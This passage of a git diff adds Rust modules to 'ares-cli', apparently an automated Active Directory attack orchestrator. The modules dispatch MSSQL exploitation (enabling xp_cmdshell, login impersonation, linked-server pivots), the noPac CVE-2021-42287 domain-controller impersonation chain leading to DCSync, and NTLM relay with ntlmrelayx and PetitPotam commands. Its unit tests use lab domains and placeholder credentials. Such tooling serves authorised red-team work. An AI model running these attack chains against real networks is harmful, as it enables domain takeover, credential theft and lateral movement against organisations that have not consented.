+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ }
+
+ #[tokio::test]
+ async fn collect_vuln_with_empty_target_and_no_detail_ip_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state.credentials.push(make_cred("sa", "contoso.local"));
+ state.discovered_vulnerabilities.insert(
+ "v1".into(),
+ make_vuln("v1", "mssql_access", "", json!({"domain": "contoso.local"})),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
index 8c2ab558..aeaea38b 100644
--- a/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/mssql_exploitation.rs
@@ -21,7 +21,7 @@ use tracing::{debug, info, warn};
use crate::orchestrator::dispatcher::Dispatcher;
/// Dedup key prefix for MSSQL deep exploitation.
-const DEDUP_MSSQL_DEEP: &str = "mssql_deep";
+pub(crate) const DEDUP_MSSQL_DEEP: &str = "mssql_deep";
/// Monitors for exploited MSSQL vulns and dispatches follow-up exploitation.
/// Interval: 30s.
@@ -83,8 +83,18 @@ pub async fn auto_mssql_exploitation(
.to_string();
// Find a credential for MSSQL access.
- // Prefer creds for the target domain, fall back to any cred.
- let credential = state
+ // When the target domain is known, prefer a credential from
+ // that domain (cross-forest NTLM auth otherwise falls through
+ // to Guest, e.g. jdoe@contoso.local → FABRIKAM\Guest on
+ // fabrikam.local SQLEXPRESS).
+ //
+ // For `mssql_linked_server` vulns, fall back to a trusted-domain
+ // credential when no same-domain cred exists: the link hop
+ // executes via stored login mapping on the remote side, so
+ // any cred that authenticates to the source server is fine
+ // (e.g., a child cred lands on sql-link01, then EXEC AT
+ // [SQL01] runs as fabrikam\sql_svc via the stored mapping).
+ let same_domain = state
.credentials
.iter()
.find(|c| {
@@ -93,13 +103,21 @@ pub async fn auto_mssql_exploitation(
&& (domain.is_empty()
|| c.domain.to_lowercase() == domain.to_lowercase())
})
- .or_else(|| {
- state.credentials.iter().find(|c| {
- !c.password.is_empty()
- && !state.is_credential_quarantined(&c.username, &c.domain)
- })
- })
.cloned();
+ let credential = same_domain.or_else(|| {
+ if domain.is_empty() {
+ state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned()
+ } else {
+ state.find_trust_credential(&domain)
+ }
+ });
if credential.is_none() {
debug!(
@@ -142,9 +160,17 @@ pub async fn auto_mssql_exploitation(
"objectives": [
"Enable xp_cmdshell and execute whoami to confirm code execution",
"Try EXECUTE AS LOGIN = 'sa' if current user is not sysadmin",
+ "Enumerate ALL impersonation privileges: SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'",
+ "For each impersonatable login, try EXECUTE AS LOGIN = '' and check IS_SRVROLEMEMBER('sysadmin')",
+ "Check database-level impersonation: SELECT * FROM sys.database_permissions WHERE permission_name = 'IMPERSONATE'",
+ "Try EXECUTE AS USER = 'dbo' in each database (master, msdb, tempdb) for db_owner escalation",
+ "Check if any database has TRUSTWORTHY = ON: SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1",
"Extract credentials via xp_cmdshell (e.g., whoami /priv, reg query for autologon)",
"Check for SeImpersonatePrivilege for potato escalation",
- "Enumerate linked servers for lateral movement",
+ "Enumerate linked servers and test RPC execution on each link",
+ "Check who is sysadmin: SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1",
+ "For cross-forest linked-server pivots: enumerate SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id; — if `is_rpc_out_enabled=1` and `uses_self_credential=0`, use `mssql_openquery` (rides stored login mapping, bypasses double-hop)",
+ "If `mssql_exec_linked` fails on a cross-forest link with auth errors, retry with `impersonate_user='sa'` to wrap the hop in `EXECUTE AS LOGIN`, or switch to `mssql_openquery`",
],
});
@@ -192,7 +218,7 @@ struct MssqlDeepWork {
/// MSSQL exploitation (follow-up on confirmed MSSQL access).
pub(crate) fn is_mssql_deep_candidate(vuln_type: &str) -> bool {
let vtype = vuln_type.to_lowercase();
- vtype == "mssql_access" || vtype == "mssql_linked_server"
+ vtype == "mssql_access" || vtype == "mssql_linked_server" || vtype == "mssql_impersonation"
}
/// Extract the target IP from vulnerability details, with fallbacks.
@@ -227,11 +253,12 @@ mod tests {
assert!(is_mssql_deep_candidate("MSSQL_ACCESS"));
assert!(is_mssql_deep_candidate("mssql_linked_server"));
assert!(is_mssql_deep_candidate("MSSQL_LINKED_SERVER"));
+ assert!(is_mssql_deep_candidate("mssql_impersonation"));
+ assert!(is_mssql_deep_candidate("MSSQL_IMPERSONATION"));
}
#[test]
fn is_mssql_deep_candidate_negative() {
- assert!(!is_mssql_deep_candidate("mssql_impersonation"));
assert!(!is_mssql_deep_candidate("rbcd"));
assert!(!is_mssql_deep_candidate("esc1"));
assert!(!is_mssql_deep_candidate(""));
diff --git a/ares-cli/src/orchestrator/automation/nopac.rs b/ares-cli/src/orchestrator/automation/nopac.rs
new file mode 100644
index 00000000..dac662c2
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/nopac.rs
@@ -0,0 +1,384 @@
+//! auto_nopac -- exploit CVE-2021-42287/CVE-2021-42278 (noPac / SamAccountName
+//! spoofing) when conditions are met.
+//!
+//! noPac creates a computer account, renames it to match a DC, requests a TGT,
+//! then restores the name. The TGT now impersonates the DC, enabling DCSync.
+//! Requires: valid domain credentials, MAQ > 0 (default 10), unpatched DCs.
+//!
+//! The worker has a `nopac` tool that wraps the full chain.
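+//!
+//! Sketch of the chain (steps only; exact commands are the worker's concern):
+//!
+//! ```text
+//! 1. create FAKE01$                (allowed while MAQ > 0)
+//! 2. rename sAMAccountName         FAKE01$ -> DC01 (no trailing $)
+//! 3. request a TGT as DC01
+//! 4. restore the original name
+//! 5. S4U2self with the stale TGT -> service ticket as the DC -> DCSync
+//! ```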
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect noPac work items from state (pure logic, no async).
+fn collect_nopac_work(state: &StateInner) -> Vec<NopacWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ // Skip domains we already dominate -- noPac is pointless if we have krbtgt
+ if state.dominated_domains.contains(&domain.to_lowercase()) {
+ continue;
+ }
+
+ // Find a credential for this domain
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ let dedup_key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip);
+ if state.is_processed(DEDUP_NOPAC, &dedup_key) {
+ continue;
+ }
+
+ items.push(NopacWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Monitors for noPac exploitation opportunities.
+/// Dispatches against each DC+credential pair once.
+/// Interval: 45s (low-priority CVE check).
+pub async fn auto_nopac(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("nopac") {
+ continue;
+ }
+
+        let work: Vec<NopacWork> = {
+ let state = dispatcher.state.read().await;
+ collect_nopac_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "nopac",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("nopac");
+ match dispatcher
+ .throttled_submit("exploit", "privesc", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ dc = %item.dc_ip,
+ domain = %item.domain,
+ "noPac (CVE-2021-42287) exploitation dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_NOPAC, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_NOPAC, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(dc = %item.dc_ip, "noPac task deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch noPac");
+ }
+ }
+ }
+ }
+}
+
+struct NopacWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("nopac:{}:{}", "contoso.local", "192.168.58.10");
+ assert_eq!(key, "nopac:contoso.local:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!(
+ "nopac:{}:{}",
+ "CONTOSO.LOCAL".to_lowercase(),
+ "192.168.58.10"
+ );
+ assert_eq!(key, "nopac:contoso.local:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_NOPAC, "nopac");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "nopac",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "nopac");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = NopacWork {
+ dedup_key: "nopac:contoso.local:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "nopac:contoso.local:192.168.58.10");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn dedup_key_case_normalization() {
+ let domain = "CONTOSO.LOCAL";
+ let dc_ip = "192.168.58.10";
+ let key = format!("nopac:{}:{}", domain.to_lowercase(), dc_ip);
+ assert_eq!(key, "nopac:contoso.local:192.168.58.10");
+
+ let domain2 = "Fabrikam.Local";
+ let key2 = format!("nopac:{}:{}", domain2.to_lowercase(), "192.168.58.20");
+ assert_eq!(key2, "nopac:fabrikam.local:192.168.58.20");
+ }
+
+ // --- collect_nopac_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dc_with_matching_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_nopac_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].dedup_key, "nopac:contoso.local:192.168.58.10");
+ }
+
+ #[test]
+ fn collect_skips_dominated_domain() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.dominated_domains.insert("contoso.local".into());
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_no_matching_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Credential for different domain, noPac requires exact domain match
+ state.credentials.push(make_cred("admin", "fabrikam.local"));
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_already_processed_dedup() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_NOPAC, "nopac:contoso.local:192.168.58.10".into());
+ let work = collect_nopac_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_multiple_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fabadmin", "fabrikam.local"));
+ let work = collect_nopac_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_case_insensitive_domain_match() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_nopac_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn domain_matching_for_credential_selection() {
+ let cred_contoso = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let cred_fabrikam = ares_core::models::Credential {
+ id: "c2".into(),
+ username: "fabadmin".into(),
+ password: "FabPass!".into(), // pragma: allowlist secret
+ domain: "fabrikam.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let creds = [cred_contoso, cred_fabrikam];
+ let target_domain = "fabrikam.local";
+
+ let matched = creds
+ .iter()
+ .find(|c| c.domain.to_lowercase() == target_domain.to_lowercase());
+ assert!(matched.is_some());
+ assert_eq!(matched.unwrap().username, "fabadmin");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/ntlm_relay.rs b/ares-cli/src/orchestrator/automation/ntlm_relay.rs
new file mode 100644
index 00000000..75e57b1b
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/ntlm_relay.rs
@@ -0,0 +1,850 @@
+//! auto_ntlm_relay -- orchestrate NTLM relay attacks when conditions are met.
+//!
+//! NTLM relay requires two sides: a relay listener (ntlmrelayx) and a coercion
+//! trigger (PetitPotam, PrinterBug, scheduled task bots). This module dispatches
+//! relay attacks when:
+//!
+//! 1. SMB signing is disabled on a target (relay destination)
+//! 2. An ADCS web enrollment endpoint exists (ESC8 relay target)
+//! 3. We have credentials to trigger coercion or a known coercion source
+//!
+//! The worker agent coordinates ntlmrelayx + coercion within a single task.
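+//!
+//! Conceptually the worker pairs the two sides roughly like this (flags are
+//! illustrative, not the exact invocation):
+//!
+//! ```text
+//! ntlmrelayx.py -t ldaps://<dc_ip> --shadow-credentials   # relay listener
+//! PetitPotam.py <listener_ip> <coercion_source>           # coercion trigger
+//! ```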
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Dedup key prefix for relay attacks.
+const DEDUP_SET: &str = DEDUP_NTLM_RELAY;
+
+/// Monitors for NTLM relay opportunities and dispatches relay attacks.
+/// Interval: 30s.
+pub async fn auto_ntlm_relay(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("ntlm_relay") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+        let work: Vec<RelayWork> = {
+ let state = dispatcher.state.read().await;
+ collect_relay_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = match &item.relay_type {
+ RelayType::SmbToLdap => json!({
+ "technique": "ntlm_relay_ldap",
+ "relay_target": item.relay_target,
+ "listener_ip": item.listener,
+ "coercion_source": item.coercion_source,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ }),
+ RelayType::Esc8 { ca_name, domain } => json!({
+ "technique": "ntlm_relay_adcs",
+ "relay_target": item.relay_target,
+ "listener_ip": item.listener,
+ "ca_name": ca_name,
+ "domain": domain,
+ "coercion_source": item.coercion_source,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ }),
+ };
+
+ let priority = dispatcher.effective_priority("ntlm_relay");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ relay_target = %item.relay_target,
+ relay_type = %item.relay_type,
+ "NTLM relay attack dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SET, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SET, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(relay = %item.relay_target, "NTLM relay task deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, relay = %item.relay_target, "Failed to dispatch NTLM relay");
+ }
+ }
+ }
+ }
+}
+
+/// Collect relay work items from current state.
+///
+/// Pure logic extracted from `auto_ntlm_relay` so it can be unit-tested without
+/// needing a `Dispatcher` or async runtime (beyond state construction).
+fn collect_relay_work(
+ state: &crate::orchestrator::state::StateInner,
+ listener: &str,
+) -> Vec<RelayWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // Path 1: Relay to hosts with SMB signing disabled → LDAP shadow creds / RBCD
+ for vuln in state.discovered_vulnerabilities.values() {
+ if vuln.vuln_type.to_lowercase() != "smb_signing_disabled" {
+ continue;
+ }
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ continue;
+ }
+
+ let target_ip = vuln
+ .details
+ .get("target_ip")
+ .or_else(|| vuln.details.get("ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(&vuln.target);
+
+ if target_ip.is_empty() {
+ continue;
+ }
+
+ let relay_key = format!("smb_relay:{target_ip}");
+ if state.is_processed(DEDUP_SET, &relay_key) {
+ continue;
+ }
+
+ let coercion_source = find_coercion_source(&state.domain_controllers, |ip| {
+ state.is_processed(DEDUP_COERCED_DCS, ip)
+ });
+
+ let cred = match state.credentials.first() {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(RelayWork {
+ dedup_key: relay_key,
+ relay_type: RelayType::SmbToLdap,
+ relay_target: target_ip.to_string(),
+ coercion_source,
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ // Path 2: Relay to ADCS web enrollment (ESC8)
+ for vuln in state.discovered_vulnerabilities.values() {
+ let vtype = vuln.vuln_type.to_lowercase();
+ if vtype != "esc8" && vtype != "adcs_web_enrollment" {
+ continue;
+ }
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ continue;
+ }
+
+ let ca_host = vuln
+ .details
+ .get("ca_host")
+ .or_else(|| vuln.details.get("target_ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(&vuln.target);
+
+ if ca_host.is_empty() {
+ continue;
+ }
+
+ let relay_key = format!("esc8_relay:{ca_host}");
+ if state.is_processed(DEDUP_SET, &relay_key) {
+ continue;
+ }
+
+ let coercion_source = find_coercion_source(&state.domain_controllers, |ip| {
+ state.is_processed(DEDUP_COERCED_DCS, ip)
+ });
+
+ let cred = match state.credentials.first() {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ let ca_name = vuln
+ .details
+ .get("ca_name")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ let domain = vuln
+ .details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ items.push(RelayWork {
+ dedup_key: relay_key,
+ relay_type: RelayType::Esc8 { ca_name, domain },
+ relay_target: ca_host.to_string(),
+ coercion_source,
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Find the best coercion source (a DC IP we can PetitPotam/PrinterBug).
+///
+/// Takes the domain_controllers map and a closure to check dedup state,
+/// keeping us decoupled from `StateInner`'s module visibility.
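+///
+/// E.g. with two DCs where one is already coerced, the other is returned;
+/// when every DC has been processed it still returns one rather than `None`.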
+fn find_coercion_source(
+    domain_controllers: &std::collections::HashMap<String, String>,
+    is_processed: impl Fn(&str) -> bool,
+) -> Option<String> {
+ // Prefer a DC we haven't already coerced
+ domain_controllers
+ .values()
+ .find(|ip| !is_processed(ip))
+ .or_else(|| domain_controllers.values().next())
+ .cloned()
+}
+
+struct RelayWork {
+ dedup_key: String,
+ relay_type: RelayType,
+ relay_target: String,
+    coercion_source: Option<String>,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+enum RelayType {
+ SmbToLdap,
+ Esc8 { ca_name: String, domain: String },
+}
+
+impl std::fmt::Display for RelayType {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ match self {
+ Self::SmbToLdap => write!(f, "smb_to_ldap"),
+ Self::Esc8 { .. } => write!(f, "esc8_adcs"),
+ }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use std::collections::HashMap;
+
+ #[test]
+ fn relay_type_display() {
+ assert_eq!(RelayType::SmbToLdap.to_string(), "smb_to_ldap");
+ assert_eq!(
+ RelayType::Esc8 {
+ ca_name: "CA".into(),
+ domain: "contoso.local".into()
+ }
+ .to_string(),
+ "esc8_adcs"
+ );
+ }
+
+ #[test]
+ fn dedup_key_format_smb() {
+ let key = format!("smb_relay:{}", "192.168.58.22");
+ assert_eq!(key, "smb_relay:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_key_format_esc8() {
+ let key = format!("esc8_relay:{}", "192.168.58.10");
+ assert_eq!(key, "esc8_relay:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SET, "ntlm_relay");
+ }
+
+ #[test]
+ fn find_coercion_source_prefers_unprocessed() {
+ let mut dcs = HashMap::new();
+ dcs.insert("contoso.local".into(), "192.168.58.10".into());
+ dcs.insert("fabrikam.local".into(), "192.168.58.20".into());
+
+ // First DC already processed, second not
+ let result = find_coercion_source(&dcs, |ip| ip == "192.168.58.10");
+ assert!(result.is_some());
+ assert_eq!(result.unwrap(), "192.168.58.20");
+ }
+
+ #[test]
+ fn find_coercion_source_falls_back_to_any() {
+ let mut dcs = HashMap::new();
+ dcs.insert("contoso.local".into(), "192.168.58.10".into());
+
+ // All processed, still returns one
+ let result = find_coercion_source(&dcs, |_| true);
+ assert!(result.is_some());
+ assert_eq!(result.unwrap(), "192.168.58.10");
+ }
+
+ #[test]
+ fn find_coercion_source_empty_map() {
+ let dcs = HashMap::new();
+ let result = find_coercion_source(&dcs, |_| false);
+ assert!(result.is_none());
+ }
+
+ #[test]
+ fn esc8_vuln_type_matching() {
+ let types = ["esc8", "adcs_web_enrollment", "ESC8", "ADCS_WEB_ENROLLMENT"];
+ for t in &types {
+ let vtype = t.to_lowercase();
+ assert!(
+ vtype == "esc8" || vtype == "adcs_web_enrollment",
+ "{t} should match"
+ );
+ }
+ }
+
+ #[test]
+ fn smb_signing_vuln_type_matching() {
+ let vtype = "smb_signing_disabled".to_lowercase();
+ assert_eq!(vtype, "smb_signing_disabled");
+
+ let not_smb = "mssql_access".to_lowercase();
+ assert_ne!(not_smb, "smb_signing_disabled");
+ }
+
+ #[test]
+ fn relay_work_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = RelayWork {
+ dedup_key: "smb_relay:192.168.58.22".into(),
+ relay_type: RelayType::SmbToLdap,
+ relay_target: "192.168.58.22".into(),
+ coercion_source: Some("192.168.58.10".into()),
+ listener: "192.168.58.100".into(),
+ credential: cred.clone(),
+ };
+ assert_eq!(work.relay_target, "192.168.58.22");
+ assert_eq!(work.listener, "192.168.58.100");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn smb_to_ldap_payload_structure() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ntlm_relay_ldap",
+ "relay_target": "192.168.58.22",
+ "listener_ip": "192.168.58.100",
+ "coercion_source": "192.168.58.10",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "ntlm_relay_ldap");
+ assert_eq!(payload["relay_target"], "192.168.58.22");
+ assert_eq!(payload["listener_ip"], "192.168.58.100");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn esc8_payload_structure() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let relay_type = RelayType::Esc8 {
+ ca_name: "contoso-CA".into(),
+ domain: "contoso.local".into(),
+ };
+ let payload = json!({
+ "technique": "ntlm_relay_adcs",
+ "relay_target": "192.168.58.10",
+ "listener_ip": "192.168.58.100",
+ "ca_name": "contoso-CA",
+ "domain": "contoso.local",
+ "coercion_source": "192.168.58.20",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "ntlm_relay_adcs");
+ assert_eq!(payload["ca_name"], "contoso-CA");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(relay_type.to_string(), "esc8_adcs");
+ }
+
+ #[test]
+ fn target_ip_extraction_from_vuln_details() {
+ let details = serde_json::json!({"target_ip": "192.168.58.22", "ip": "192.168.58.23"});
+ let fallback = "192.168.58.99";
+ let target = details
+ .get("target_ip")
+ .or_else(|| details.get("ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(target, "192.168.58.22");
+ }
+
+ #[test]
+ fn target_ip_fallback_to_ip_field() {
+ let details = serde_json::json!({"ip": "192.168.58.23"});
+ let fallback = "192.168.58.99";
+ let target = details
+ .get("target_ip")
+ .or_else(|| details.get("ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(target, "192.168.58.23");
+ }
+
